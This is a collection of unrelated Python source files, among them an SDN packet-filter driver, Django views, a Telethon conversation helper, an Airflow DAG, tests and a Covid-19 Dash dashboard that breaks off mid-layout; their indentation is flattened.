"""Trema (Sliceable Switch) PacketFilter Driver Mixin."""
filters_path = "/filters"
filter_path = "/filters/%s"
@classmethod
def filter_supported(cls):
return True
def create_filter(self, ofc_network_id, filter_dict,
portinfo=None, filter_id=None):
if filter_dict['action'].upper() in ["ACCEPT", "ALLOW"]:
ofc_action = "ALLOW"
elif filter_dict['action'].upper() in ["DROP", "DENY"]:
ofc_action = "DENY"
body = {'priority': filter_dict['priority'],
'slice': self._get_network_id(ofc_network_id),
'action': ofc_action}
ofp_wildcards = ["dl_vlan", "dl_vlan_pcp", "nw_tos"]
if portinfo:
body['in_datapath_id'] = portinfo.datapath_id
body['in_port'] = portinfo.port_no
else:
body['wildcards'] = "in_datapath_id"
ofp_wildcards.append("in_port")
if filter_dict['src_mac']:
body['dl_src'] = filter_dict['src_mac']
else:
ofp_wildcards.append("dl_src")
if filter_dict['dst_mac']:
body['dl_dst'] = filter_dict['dst_mac']
else:
ofp_wildcards.append("dl_dst")
if filter_dict['src_cidr']:
body['nw_src'] = filter_dict['src_cidr']
else:
ofp_wildcards.append("nw_src:32")
if filter_dict['dst_cidr']:
body['nw_dst'] = filter_dict['dst_cidr']
else:
ofp_wildcards.append("nw_dst:32")
if filter_dict['protocol']:
if filter_dict['protocol'].upper() in "ICMP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(1)
elif filter_dict['protocol'].upper() in "TCP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(6)
elif filter_dict['protocol'].upper() in "UDP":
body['dl_type'] = "0x800"
body['nw_proto'] = hex(17)
elif filter_dict['protocol'].upper() in "ARP":
body['dl_type'] = "0x806"
ofp_wildcards.append("nw_proto")
else:
body['nw_proto'] = filter_dict['protocol']
if filter_dict['eth_type']:
body['dl_type'] = filter_dict['eth_type']
else:
ofp_wildcards.append("dl_type")
else:
ofp_wildcards.append("dl_type")
ofp_wildcards.append("nw_proto")
if filter_dict['src_port']:
body['tp_src'] = hex(filter_dict['src_port'])
else:
ofp_wildcards.append("tp_src")
if filter_dict['dst_port']:
body['tp_dst'] = hex(filter_dict['dst_port'])
else:
ofp_wildcards.append("tp_dst")
ofc_filter_id = filter_id or uuidutils.generate_uuid()
body['id'] = ofc_filter_id
body['ofp_wildcards'] = ','.join(ofp_wildcards)
self.client.post(self.filters_path, body=body)
return self.filter_path % ofc_filter_id
def delete_filter(self, ofc_filter_id):
return self.client.delete(ofc_filter_id)
def convert_ofc_filter_id(self, context, ofc_filter_id):
# If ofc_filter_id starts with '/', it is already new-style
if ofc_filter_id[0] == '/':
return ofc_filter_id
return self.filter_path % ofc_filter_id
class TremaPortBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port base binding.
TremaPortBaseDriver uses port base binding.
Ports are identified by datapath_id, port_no and vlan_id.
"""
ports_path = "%(network)s/ports"
port_path = "%(network)s/ports/%(port)s"
def create_port(self, ofc_network_id, portinfo,
port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.ports_path % {'network': ofc_network_id}
body = {'id': ofc_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
return self.port_path % {'network': ofc_network_id,
'port': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id,
tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
return self.port_path % {'network': ofc_network_id,
'port': ofc_port_id}
class TremaPortMACBaseDriver(TremaDriverBase, TremaFilterDriver):
"""Trema (Sliceable Switch) Driver for port-mac base binding.
TremaPortBaseDriver uses port-mac base binding.
Ports are identified by datapath_id, port_no, vlan_id and mac.
"""
ports_path = "%(network)s/ports"
port_path = "%(network)s/ports/%(port)s"
attachments_path = "%(network)s/ports/%(port)s/attachments"
attachment_path = "%(network)s/ports/%(port)s/attachments/%(attachment)s"
def create_port(self, ofc_network_id, portinfo, port_id=None):
#NOTE: This Driver create slices with Port-MAC Based bindings on Trema
# Sliceable. It's REST API requires Port Based binding before you
# define Port-MAC Based binding.
ofc_port_id = port_id or uuidutils.generate_uuid()
dummy_port_id = "dummy-%s" % ofc_port_id
path = self.ports_path % {'network': ofc_network_id}
body = {'id': dummy_port_id,
'datapath_id': portinfo.datapath_id,
'port': str(portinfo.port_no),
'vid': str(portinfo.vlan_id)}
self.client.post(path, body=body)
path = self.attachments_path % {'network': ofc_network_id,
'port': dummy_port_id}
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
path = self.port_path % {'network': ofc_network_id,
'port': dummy_port_id}
self.client.delete(path)
return self.attachment_path % {'network': ofc_network_id,
'port': dummy_port_id,
'attachment': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
dummy_port_id = 'dummy-%s' % ofc_port_id
return self.attachment_path % {'network': ofc_network_id,
'port': dummy_port_id,
'attachment': ofc_port_id}
class TremaMACBaseDriver(TremaDriverBase):
"""Trema (Sliceable Switch) Driver for mac base binding.
TremaPortBaseDriver uses mac base binding.
Ports are identified by mac.
"""
attachments_path = "%(network)s/attachments"
attachment_path = "%(network)s/attachments/%(attachment)s"
@classmethod
def filter_supported(cls):
return False
def create_port(self, ofc_network_id, portinfo, port_id=None):
ofc_port_id = port_id or uuidutils.generate_uuid()
path = self.attachments_path % {'network': ofc_network_id}
body = {'id': ofc_port_id, 'mac': portinfo.mac}
self.client.post(path, body=body)
return self.attachment_path % {'network': ofc_network_id,
'attachment': ofc_port_id}
def delete_port(self, ofc_port_id):
return self.client.delete(ofc_port_id)
def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
# If ofc_port_id starts with '/', it is already new-style
if ofc_port_id[0] == '/':
return ofc_port_id
ofc_network_id = ndb.get_ofc_id_lookup_both(
context.session, 'ofc_network', network_id)
ofc_network_id = self.convert_ofc_network_id(
context, ofc_network_id, tenant_id)
return self.attachment_path % {'network': ofc_network_id,
'attachment': ofc_port_id}
|
StarcoderdataPython
|
9650994
|
from django.conf.urls import url
from .views import (OrderCreateView,single_order,SingleOrder,
generate_PDF,ReportsView,AdminReportsView)
urlpatterns =[
url(r'^create_order/$',OrderCreateView.as_view(),name='create_order'),
url(r'^single_order/(?P<order_id>[0-9]+)/$',SingleOrder.as_view(),name='single_order'),
#url(r'^pdf/(?P<order_id>[0-9]+)/$',GeneratePdf.as_view(),name='pdf_view'),
url(r'^pdf/(?P<order_id>[0-9]+)/$',generate_PDF,name='pdf_view'),
url(r'^order_reports/$',ReportsView.as_view(),name='order_reports'),
url(r'^all_order_reports/$',AdminReportsView.as_view(),name='all_order_reports'),
]
|
StarcoderdataPython
|
1963602
|
from django.shortcuts import render, redirect
from django.views.generic import TemplateView
class IndexView(TemplateView):
"""Index view."""
template_name = "tosti/index.html"
def get(self, request, **kwargs):
"""
GET request for IndexView.
:param request: the request
:param kwargs: keyword arguments
:return: a render of the index page
"""
return render(request, self.template_name)
class PrivacyView(TemplateView):
"""Privacy policy view."""
template_name = "tosti/privacy.html"
class WelcomeView(TemplateView):
"""Welcome page."""
template_name = "tosti/welcome.html"
class DocumentationView(TemplateView):
"""Documentation page."""
template_name = "tosti/documentation.html"
def handler403(request, exception):
"""
Handle a 403 (permission denied) exception.
:param request: the request
:param exception: the exception
:return: a render of the 403 page
"""
if request.user.is_authenticated:
return render(request, "tosti/403.html", status=403)
else:
return redirect("users:login")
def handler404(request, exception):
"""
Handle a 404 (page not found) exception.
:param request: the request
:param exception: the exception
:return: a render of the 404 page
"""
return render(request, "tosti/404.html", status=404)
def handler500(request):
"""
Handle a 50x (server fault) exception.
:param request: the request
:return: a render of the 500 page
"""
return render(request, "tosti/500.html", status=500)
|
StarcoderdataPython
|
6513060
|
<reponame>mhwdvs/MITSBot<gh_stars>0
from . import ozbargain
|
StarcoderdataPython
|
293982
|
<filename>src/visualization/recall.py<gh_stars>1-10
import streamlit as st
def recall_app():
st.title("Patient notes collection")
|
StarcoderdataPython
|
195249
|
import asyncio
import itertools
import time
from .chatgetter import ChatGetter
from ... import helpers, utils, errors
from ...events.common import EventCommon
# Sometimes the edits arrive very fast (within the same second).
# In that case we add a small delta so that the age is older, for
# comparision purposes. This value is enough for up to 1000 messages.
_EDIT_COLLISION_DELTA = 0.001
class Conversation(ChatGetter):
"""
Represents a conversation inside an specific chat.
A conversation keeps track of new messages since it was
created until its exit and easily lets you query the
current state.
If you need a conversation across two or more chats,
you should use two conversations and synchronize them
as you better see fit.
"""
_id_counter = 0
_custom_counter = 0
def __init__(self, client, input_chat,
*, timeout, total_timeout, max_messages,
exclusive, replies_are_responses):
# This call resets the client
ChatGetter.__init__(self, input_chat=input_chat)
self._id = Conversation._id_counter
Conversation._id_counter += 1
self._client = client
self._timeout = timeout
self._total_timeout = total_timeout
self._total_due = None
self._outgoing = set()
self._last_outgoing = 0
self._incoming = []
self._last_incoming = 0
self._max_incoming = max_messages
self._last_read = None
self._custom = {}
self._pending_responses = {}
self._pending_replies = {}
self._pending_edits = {}
self._pending_reads = {}
self._exclusive = exclusive
# The user is able to expect two responses for the same message.
# {desired message ID: next incoming index}
self._response_indices = {}
if replies_are_responses:
self._reply_indices = self._response_indices
else:
self._reply_indices = {}
self._edit_dates = {}
async def send_message(self, *args, **kwargs):
"""
Sends a message in the context of this conversation. Shorthand
for `telethon.client.messages.MessageMethods.send_message` with
``entity`` already set.
"""
message = await self._client.send_message(
self._input_chat, *args, **kwargs)
self._outgoing.add(message.id)
self._last_outgoing = message.id
return message
async def send_file(self, *args, **kwargs):
"""
Sends a file in the context of this conversation. Shorthand
for `telethon.client.uploads.UploadMethods.send_file` with
``entity`` already set.
"""
message = await self._client.send_file(
self._input_chat, *args, **kwargs)
self._outgoing.add(message.id)
self._last_outgoing = message.id
return message
def mark_read(self, message=None):
"""
Marks as read the latest received message if ``message is None``.
Otherwise, marks as read until the given message (or message ID).
This is equivalent to calling `client.send_read_acknowledge
<telethon.client.messages.MessageMethods.send_read_acknowledge>`.
"""
if message is None:
if self._incoming:
message = self._incoming[-1].id
else:
message = 0
elif not isinstance(message, int):
message = message.id
return self._client.send_read_acknowledge(
self._input_chat, max_id=message)
async def get_response(self, message=None, *, timeout=None):
"""
Gets the next message that responds to a previous one.
Args:
message (`Message <telethon.tl.custom.message.Message>` | `int`, optional):
The message (or the message ID) for which a response
is expected. By default this is the last sent message.
timeout (`int` | `float`, optional):
If present, this `timeout` (in seconds) will override the
per-action timeout defined for the conversation.
"""
return await self._get_message(
message, self._response_indices, self._pending_responses, timeout,
lambda x, y: True
)
async def get_reply(self, message=None, *, timeout=None):
"""
Gets the next message that explicitly replies to a previous one.
"""
return await self._get_message(
message, self._reply_indices, self._pending_replies, timeout,
lambda x, y: x.reply_to_msg_id == y
)
def _get_message(
self, target_message, indices, pending, timeout, condition):
"""
Gets the next desired message under the desired condition.
Args:
target_message (`object`):
The target message for which we want to find another
response that applies based on `condition`.
indices (`dict`):
This dictionary remembers the last ID chosen for the
input `target_message`.
pending (`dict`):
This dictionary remembers {msg_id: Future} to be set
once `condition` is met.
timeout (`int`):
The timeout (in seconds) override to use for this operation.
condition (`callable`):
The condition callable that checks if an incoming
message is a valid response.
"""
start_time = time.time()
target_id = self._get_message_id(target_message)
# If there is no last-chosen ID, make sure to pick one *after*
# the input message, since we don't want responses back in time
if target_id not in indices:
for i, incoming in enumerate(self._incoming):
if incoming.id > target_id:
indices[target_id] = i
break
else:
indices[target_id] = len(self._incoming)
# We will always return a future from here, even if the result
# can be set immediately. Otherwise, needing to await only
# sometimes is an annoying edge case (i.e. we would return
# a `Message` but `get_response()` always `await`'s).
future = self._client.loop.create_future()
# If there are enough responses saved return the next one
last_idx = indices[target_id]
if last_idx < len(self._incoming):
incoming = self._incoming[last_idx]
if condition(incoming, target_id):
indices[target_id] += 1
future.set_result(incoming)
return future
# Otherwise the next incoming response will be the one to use
pending[target_id] = future
return self._get_result(future, start_time, timeout)
async def get_edit(self, message=None, *, timeout=None):
"""
Awaits for an edit after the last message to arrive.
The arguments are the same as those for `get_response`.
"""
start_time = time.time()
target_id = self._get_message_id(message)
target_date = self._edit_dates.get(target_id, 0)
earliest_edit = min(
(x for x in self._incoming
if x.edit_date
and x.id > target_id
and x.edit_date.timestamp() > target_date
),
key=lambda x: x.edit_date.timestamp(),
default=None
)
if earliest_edit and earliest_edit.edit_date.timestamp() > target_date:
self._edit_dates[target_id] = earliest_edit.edit_date.timestamp()
return earliest_edit
# Otherwise the next incoming response will be the one to use
future = asyncio.Future(loop=self._client.loop)
self._pending_edits[target_id] = future
return await self._get_result(future, start_time, timeout)
async def wait_read(self, message=None, *, timeout=None):
"""
Awaits for the sent message to be marked as read. Note that
receiving a response doesn't imply the message was read, and
this action will also trigger even without a response.
"""
start_time = time.time()
future = self._client.loop.create_future()
target_id = self._get_message_id(message)
if self._last_read is None:
self._last_read = target_id - 1
if self._last_read >= target_id:
return
self._pending_reads[target_id] = future
return await self._get_result(future, start_time, timeout)
async def wait_event(self, event, *, timeout=None):
"""
Waits for a custom event to occur. Timeouts still apply.
Unless you're certain that your code will run fast enough,
generally you should get a "handle" of this special coroutine
before acting. Generally, you should do this:
>>> from telethon import TelegramClient, events
>>>
>>> client = TelegramClient(...)
>>>
>>> async def main():
>>> async with client.conversation(...) as conv:
>>> response = conv.wait_event(events.NewMessage(incoming=True))
>>> await conv.send_message('Hi')
>>> response = await response
This way your event can be registered before acting,
since the response may arrive before your event was
registered. It depends on your use case since this
also means the event can arrive before you send
a previous action.
"""
start_time = time.time()
if isinstance(event, type):
event = event()
await event.resolve(self._client)
counter = Conversation._custom_counter
Conversation._custom_counter += 1
future = asyncio.Future(loop=self._client.loop)
# We need the `async def` here because we want to block on the future
# from `_get_result` by using `await` on it. If we returned the future
# immediately we would `del` from `_custom` too early.
async def result():
try:
return await self._get_result(future, start_time, timeout)
finally:
del self._custom[counter]
self._custom[counter] = (event, future)
return await result()
async def _check_custom(self, built):
for i, (ev, fut) in self._custom.items():
ev_type = type(ev)
inst = built[ev_type]
if inst and ev.filter(inst):
fut.set_result(inst)
def _on_new_message(self, response):
response = response.message
if response.chat_id != self.chat_id or response.out:
return
if len(self._incoming) == self._max_incoming:
self._cancel_all(ValueError('Too many incoming messages'))
return
self._incoming.append(response)
found = []
for msg_id in self._pending_responses:
found.append(msg_id)
self._response_indices[msg_id] = len(self._incoming)
for msg_id in found:
self._pending_responses.pop(msg_id).set_result(response)
found.clear()
for msg_id in self._pending_replies:
if msg_id == response.reply_to_msg_id:
found.append(msg_id)
self._reply_indices[msg_id] = len(self._incoming)
for msg_id in found:
self._pending_replies.pop(msg_id).set_result(response)
def _on_edit(self, message):
message = message.message
if message.chat_id != self.chat_id or message.out:
return
found = []
for msg_id, pending in self._pending_edits.items():
if msg_id < message.id:
found.append(msg_id)
edit_ts = message.edit_date.timestamp()
# We compare <= because edit_ts resolution is always to
# seconds, but we may have increased _edit_dates before.
# Since the dates are ever growing this is not a problem.
if edit_ts <= self._edit_dates.get(msg_id, 0):
self._edit_dates[msg_id] += _EDIT_COLLISION_DELTA
else:
self._edit_dates[msg_id] = message.edit_date.timestamp()
for msg_id in found:
self._pending_edits.pop(msg_id).set_result(message)
def _on_read(self, event):
if event.chat_id != self.chat_id or event.inbox:
return
self._last_read = event.max_id
remove_reads = []
for msg_id, pending in self._pending_reads.items():
if msg_id >= self._last_read:
remove_reads.append(msg_id)
pending.set_result(True)
for to_remove in remove_reads:
del self._pending_reads[to_remove]
def _get_message_id(self, message):
if message is not None: # 0 is valid but false-y, check for None
return message if isinstance(message, int) else message.id
elif self._last_outgoing:
return self._last_outgoing
else:
raise ValueError('No message was sent previously')
def _get_result(self, future, start_time, timeout):
due = self._total_due
if timeout is None:
timeout = self._timeout
if timeout is not None:
due = min(due, start_time + timeout)
return asyncio.wait_for(
future,
timeout=None if due == float('inf') else due - time.time(),
loop=self._client.loop
)
def _cancel_all(self, exception=None):
for pending in itertools.chain(
self._pending_responses.values(),
self._pending_replies.values(),
self._pending_edits.values()):
if exception:
pending.set_exception(exception)
else:
pending.cancel()
for _, fut in self._custom.values():
if exception:
fut.set_exception(exception)
else:
fut.cancel()
async def __aenter__(self):
self._input_chat = \
await self._client.get_input_entity(self._input_chat)
self._chat_peer = utils.get_peer(self._input_chat)
# Make sure we're the only conversation in this chat if it's exclusive
chat_id = utils.get_peer_id(self._chat_peer)
count = self._client._ids_in_conversations.get(chat_id, 0)
if self._exclusive and count:
raise errors.AlreadyInConversationError()
self._client._ids_in_conversations[chat_id] = count + 1
self._client._conversations[self._id] = self
self._last_outgoing = 0
self._last_incoming = 0
for d in (
self._outgoing, self._incoming,
self._pending_responses, self._pending_replies,
self._pending_edits, self._response_indices,
self._reply_indices, self._edit_dates, self._custom):
d.clear()
if self._total_timeout:
self._total_due = time.time() + self._total_timeout
else:
self._total_due = float('inf')
return self
def cancel(self):
"""Cancels the current conversation and exits the context manager."""
raise _ConversationCancelled()
async def __aexit__(self, exc_type, exc_val, exc_tb):
chat_id = utils.get_peer_id(self._chat_peer)
if self._client._ids_in_conversations[chat_id] == 1:
del self._client._ids_in_conversations[chat_id]
else:
self._client._ids_in_conversations[chat_id] -= 1
del self._client._conversations[self._id]
self._cancel_all()
return isinstance(exc_val, _ConversationCancelled)
__enter__ = helpers._sync_enter
__exit__ = helpers._sync_exit
class _ConversationCancelled(InterruptedError):
pass
|
StarcoderdataPython
|
11268145
|
<gh_stars>0
"""Example DAG demonstrating the usage of the BashOperator."""
from datetime import timedelta
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
args = {
"owner": "Airflow",
"start_date": airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id="my_second_dag",
default_args=args,
schedule_interval="45 13 * * 1,3,5",
dagrun_timeout=timedelta(minutes=60),
)
run_this_last = DummyOperator(task_id="run_this_last", dag=dag,)
# [START howto_operator_bash]
run_this1 = BashOperator(task_id="echo_1", bash_command="echo 1", dag=dag,)
# [START howto_operator_bash]
run_this2 = BashOperator(task_id="echo_2", bash_command="echo 2", dag=dag,)
# [START howto_operator_bash]
run_this3 = BashOperator(task_id="echo_3", bash_command="echo 3", dag=dag,)
# [START howto_operator_bash]
run_this4 = BashOperator(task_id="echo4", bash_command="echo 4", dag=dag,)
# [END howto_operator_bash]
# for i in range(3):
# task = BashOperator(
# task_id='runme_' + str(i),
# bash_command='echo "{{ task_instance_key_str }}" && sleep 1',
# dag=dag,
# )
# task >> run_this
# [START howto_operator_bash_template]
also_run_this = BashOperator(
task_id="also_run_this",
bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',
dag=dag,
)
# [END howto_operator_bash_template]
run_this1 >> run_this2 >> [run_this3, run_this4] >> also_run_this
|
StarcoderdataPython
|
5026289
|
<filename>tests/extmod/uctypes_le_addressof_field.py<gh_stars>10-100
try:
import uctypes
except ImportError:
print("SKIP")
raise SystemExit
desc = {
"f0": uctypes.UINT8 | 0,
"f1": uctypes.UINT8 | 5,
"f2": uctypes.UINT8 | 2,
"f3": (uctypes.PTR | 8, uctypes.UINT8),
"arr": (uctypes.ARRAY | 3, uctypes.UINT8 | 2),
"sub": (4, {
"b0": uctypes.UINT8 | 0,
"b1": uctypes.UINT8 | 1,
}),
}
data = bytearray(10)
start_addr = uctypes.addressof(data)
S = uctypes.struct(start_addr, desc, uctypes.LITTLE_ENDIAN)
addr = uctypes.addressof(S, "f0")
print(addr - start_addr)
addr = uctypes.addressof(S, "f1")
print(addr - start_addr)
addr = uctypes.addressof(S, "f2")
print(addr - start_addr)
addr = uctypes.addressof(S, "f3")
print(addr - start_addr)
addr = uctypes.addressof(S, "arr")
print(addr - start_addr)
addr = uctypes.addressof(S, "sub")
print(addr - start_addr)
addr = uctypes.addressof(S.sub, "b0")
print(addr - start_addr)
addr = uctypes.addressof(S.sub, "b1")
print(addr - start_addr)
|
StarcoderdataPython
|
8065812
|
<filename>iotsim/behaviors.py<gh_stars>0
from .core import Behavior
from itertools import repeat, count
class FlatlineBehavior(Behavior):
def __init__(self, name, level=None):
super().__init__(name, level=level)
def activate(self, assembly_context=None):
self.update_parameters(assembly_context=assembly_context)
return repeat(self._parameters['level'])
class LinearBehavior(Behavior):
def __init__(self, name, bias=None, increment=None):
super().__init__(name, bias=bias, increment=increment)
def activate(self, assembly_context=None):
self.update_parameters(assembly_context=assembly_context)
return (self._parameters['bias'] + self._parameters['increment'] * (i + 1)
for i in count())
|
StarcoderdataPython
|
1659363
|
<reponame>jcfr/SlicerPipelines
import abc
import collections
from os import stat
PipelineProgress = collections.namedtuple("PipelineProgress",
"progress currentPipelinePieceName currentPipelinePieceNumber numberOfPieces")
class PipelineInterface(abc.ABC):
@staticmethod
@abc.abstractmethod
def GetName():
pass
@staticmethod
@abc.abstractmethod
def GetParameters():
pass
@staticmethod
@abc.abstractmethod
def GetInputType():
pass
@staticmethod
@abc.abstractmethod
def GetOutputType():
pass
@staticmethod
@abc.abstractmethod
def GetDependencies():
pass
@abc.abstractmethod
def Run(self, inputNode):
pass
@abc.abstractmethod
def SetProgressCallback(self, cb):
pass
class ProgressablePipeline(PipelineInterface):
def __init__(self):
super().__init__()
self._progressCallback = None
def SetProgressCallback(self, cb):
if (cb is not None and not callable(cb)):
raise TypeError("cb is not callable or None")
self._progressCallback = cb
@staticmethod
@abc.abstractmethod
def GetNumberOfPieces():
pass
def _Progress(self, moduleName, currentPipelinePieceNumber):
if self._progressCallback:
self._progressCallback(PipelineProgress(
progress=currentPipelinePieceNumber / self.GetNumberOfPieces(),
currentPipelinePieceName=moduleName,
currentPipelinePieceNumber=currentPipelinePieceNumber+1,
numberOfPieces=self.GetNumberOfPieces(),
))
class SinglePiecePipeline(ProgressablePipeline):
def __init__(self):
ProgressablePipeline.__init__(self)
@staticmethod
def GetNumberOfPieces():
return 1
@abc.abstractmethod
def _RunImpl(self, inputNode):
pass
def Run(self, inputNode):
self._Progress(self.GetName(), 0)
output = self._RunImpl(inputNode)
self._Progress(self.GetName(), 1)
return output
|
StarcoderdataPython
|
8042700
|
<gh_stars>0
import mock
import tempfile
import os
from zocalo_dls.wrapper.generic import (
ProcessRegisterWrapper,
TargetProcessRegisterWrapper,
)
@mock.patch("workflows.recipe.RecipeWrapper")
@mock.patch("procrunner.run")
def test_process_wrapper(mock_runner, mock_wrapper):
mock_runner.return_value = {"runtime": 5.0, "exitcode": 0}
command = ["ls"]
fh = tempfile.NamedTemporaryFile()
fh_log = tempfile.NamedTemporaryFile()
params = {"wrapped_commands": command, "filename": fh.name, "logname": fh_log.name}
mock_wrapper.recipe_step = {"job_parameters": params}
mock_wrapper.recwrap.send_to.return_value = None
wrapper = ProcessRegisterWrapper()
wrapper.set_recipe_wrapper(mock_wrapper)
wrapper.run()
mock_runner.assert_called_with(command)
p, f = os.path.split(fh.name)
payload = {"file_path": p, "file_name": f, "file_type": "Result"}
pl, fl = os.path.split(fh_log.name)
payloadl = {"file_path": pl, "file_name": fl, "file_type": "Log"}
mes = "result-individual-file"
calls = [mock.call(mes, payload), mock.call(mes, payloadl)]
mock_wrapper.send_to.assert_has_calls(calls)
@mock.patch("workflows.recipe.RecipeWrapper")
@mock.patch("procrunner.run")
def test_target_process_wrapper(mock_runner, mock_wrapper):
mock_runner.return_value = {"runtime": 5.0, "exitcode": 0}
command = ["ls"]
target_file = "/test.nxs"
fh = tempfile.NamedTemporaryFile()
fh_log = tempfile.NamedTemporaryFile()
params = {"wrapped_commands": command, "filename": fh.name, "logname": fh_log.name}
mock_wrapper.recipe_step = {"job_parameters": params}
mock_wrapper.recwrap.send_to.return_value = None
pay = {"target_file": target_file}
mock_wrapper.payload = pay
res_com = [command[0], target_file]
wrapper = TargetProcessRegisterWrapper()
wrapper.set_recipe_wrapper(mock_wrapper)
wrapper.run()
mock_runner.assert_called_with(res_com)
p, f = os.path.split(fh.name)
payload = {"file_path": p, "file_name": f, "file_type": "Result"}
p2 = {"target_file": fh.name}
m2 = "result-primary"
pl, fl = os.path.split(fh_log.name)
payloadl = {"file_path": pl, "file_name": fl, "file_type": "Log"}
mes = "result-individual-file"
calls = [mock.call(mes, payload), mock.call(m2, p2), mock.call(mes, payloadl)]
mock_wrapper.send_to.assert_has_calls(calls)
|
StarcoderdataPython
|
9629888
|
<gh_stars>0
#!/usr/bin/nv python3
#
######################
# Covid-19 Stats App #
######################
#
# BY: Chadless1
#
# Description: Pulls data from mytimes github and uses dash to display charts and graphs
# analyzing the data by the US and each individual state
#
import pandas as pd
import numpy as np
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
# Read csv file from github
# State Data
url = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'
df_states = pd.read_csv(url)
# Read csv file from github
# County Data
#state Codes
us_state_abbrev = {
'Alabama': 'AL',
'Alaska': 'AK',
'American Samoa': 'AS',
'Arizona': 'AZ',
'Arkansas': 'AR',
'California': 'CA',
'Colorado': 'CO',
'Connecticut': 'CT',
'Delaware': 'DE',
'District of Columbia': 'DC',
'Florida': 'FL',
'Georgia': 'GA',
'Guam': 'GU',
'Hawaii': 'HI',
'Idaho': 'ID',
'Illinois': 'IL',
'Indiana': 'IN',
'Iowa': 'IA',
'Kansas': 'KS',
'Kentucky': 'KY',
'Louisiana': 'LA',
'Maine': 'ME',
'Maryland': 'MD',
'Massachusetts': 'MA',
'Michigan': 'MI',
'Minnesota': 'MN',
'Mississippi': 'MS',
'Missouri': 'MO',
'Montana': 'MT',
'Nebraska': 'NE',
'Nevada': 'NV',
'New Hampshire': 'NH',
'New Jersey': 'NJ',
'New Mexico': 'NM',
'New York': 'NY',
'North Carolina': 'NC',
'North Dakota': 'ND',
'Northern Mariana Islands':'MP',
'Ohio': 'OH',
'Oklahoma': 'OK',
'Oregon': 'OR',
'Pennsylvania': 'PA',
'Puerto Rico': 'PR',
'Rhode Island': 'RI',
'South Carolina': 'SC',
'South Dakota': 'SD',
'Tennessee': 'TN',
'Texas': 'TX',
'Utah': 'UT',
'Vermont': 'VT',
'Virgin Islands': 'VI',
'Virginia': 'VA',
'Washington': 'WA',
'West Virginia': 'WV',
'Wisconsin': 'WI',
'Wyoming': 'WY'
}
url2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'
df = pd.read_csv(url2)
# Filter for last date
today = df['date'].iloc[-1]
df = df[df['date'] == today]
df = df.replace(us_state_abbrev)
df = df.groupby('state')['cases'].sum()
# Plot
fig = px.choropleth(df, locations=df.index,
scope='usa',
color='cases',
locationmode='USA-states',
range_color=(0,1000000),
title='Cases per State',
)
# Create Date objects
df_states['date'] = pd.to_datetime(df_states['date'])
date = df_states['date'].iloc[-1]
date = date.strftime('%m-%d-%Y')
############
# Dash App #
############
app = dash.Dash(__name__)
# Layout
app.layout = html.Div(children=[
# Header image and title
html.Header(
html.Div([
html.Img(src=app.get_asset_url('c19.jpeg')),
html.H1('Covid-19 Data'),
],className='head')
),
html.Br(),
# Intro / Date / Links
html.P('Data on Covid-19 Case Numbers and Deaths for the United States. Search by State and find out more about your area.'),
html.P('Data is currently valid from *{}*'.format(date)),
html.A('data source', href='https://github.com/nytimes/covid-19-data/'),
html.Br(),
html.A('code source', href='https://github.com/chadless1/c19-stats-app/'),
# Line break
html.Br(),
html.Hr(),
html.Br(),
# Tabs
dcc.Tabs(id="tabs", value='tab-1', children=[
dcc.Tab(label='USA', value='tab-1'),
dcc.Tab(label='Data By State', value='tab-2'),
], style={'width': '90%', 'margin': 'auto', 'box-shadow': '0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24)'}, colors={'border': 'grey', 'background': '#082255', 'primary': 'black'}),
# Tab contnent
html.Div(id='tabs-content'),
]) # main div tag
# End of app layout
###########################################################
# CallBacks #
###########################################################
# Tab Callbacks
@app.callback(Output('tabs-content', 'children'),
[Input('tabs', 'value')])
def render_content(tab):
# US Case and Death Calculations
today = df_states['date'].iloc[-1]
df_usa = df_states[df_states['date'] == today]
usa_total_cases = df_usa['cases'].sum()
usa_total_deaths = df_usa['deaths'].sum()
usa_total_df = df_states[['cases','deaths']].groupby(df_states['date'])
usa_total_df = usa_total_df.sum()
usa_last = usa_total_df.tail()
# Calculate % Change in Cases and Death
usa_case_percent = (usa_total_df['cases'].iloc[-1] - usa_total_df['cases'].iloc[-5]) / usa_total_df['cases'].iloc[-5] * 100
usa_case_percent = round(usa_case_percent, 2)
usa_death_percent = (usa_total_df['deaths'].iloc[-1] - usa_total_df['deaths'].iloc[-5]) / usa_total_df['deaths'].iloc[-5] * 100
usa_death_percent = round(usa_death_percent, 2)
# New df for graphs
dff = df_states.groupby('date')[['cases', 'deaths']].sum()
dff = dff.diff()
dff = dff.fillna(0)
dff_tail = dff.tail()
# Tab 1
if tab == 'tab-1':
return html.Div([
html.Div([
html.Br(),
html.H3('USA Data'),
html.Br(),
] ,className='row'),
# Main Div
html.Div([
# USA Cases
html.Div([
html.H4('Total Cases'),
html.H3('{:,}'.format(usa_total_cases)),
],className='four columns'),
# USA Deaths
